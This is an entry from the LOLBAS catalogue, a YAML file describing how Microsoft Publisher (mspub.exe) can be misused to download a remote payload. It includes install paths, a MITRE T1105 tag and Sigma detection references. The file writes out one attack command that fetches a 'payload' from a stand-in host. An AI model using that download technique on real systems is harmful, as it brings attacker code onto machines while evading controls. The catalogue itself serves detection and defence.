LOLBAS/yml/OtherMSBinaries/Mspub.yml
frack113 1072d3dc34
Add sigma ref Detection (#272)
* Add sigma ref

* Add missing sigma ref

* Fix sigma link

* Remove by Defender

* Remove by Defender
2022-12-29 09:51:15 -05:00

33 lines
1.6 KiB
YAML

---
Name: Mspub.exe
Description: Microsoft Publisher
Author: Nir Chako
Created: 2022-08-02
Commands:
- Command: mspub.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe
- Path: C:\Program Files\Microsoft Office\Office16\MSPUB.exe
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe
- Path: C:\Program Files\Microsoft Office\Office15\MSPUB.exe
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe
- Path: C:\Program Files\Microsoft Office\Office14\MSPUB.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: 'Nir Chako (Pentera)'
Handle: '@C_h4ck_0'